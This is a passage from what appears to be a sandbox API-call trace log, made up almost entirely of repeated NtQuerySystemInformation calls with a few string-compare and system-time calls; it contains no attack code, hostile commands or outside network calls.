Length=0x38, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0227.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x28, ResultLength=0x0) [0227.516] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd590, Length=0x28, ResultLength=0x0) [0227.516] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0227.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x50, ResultLength=0x0) [0227.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x28, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0227.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0227.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x28, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x28, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x20, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x38, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x20, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x20, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd670 | out: lpSystemTimeAsFileTime=0xc7520fd670*(dwLowDateTime=0xe8e4a269, dwHighDateTime=0x1d5fb6e)) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd728, Length=0x50, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd660, Length=0x28, ResultLength=0x0) [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x50, ResultLength=0x0) [0227.526] GetTickCount () returned 0x1179732 [0227.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0227.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0227.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0227.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0227.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0227.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0227.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0227.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x28, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0227.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0227.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0227.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.552] NtQuerySystemInformation (SystemInformationClass=0xb9, 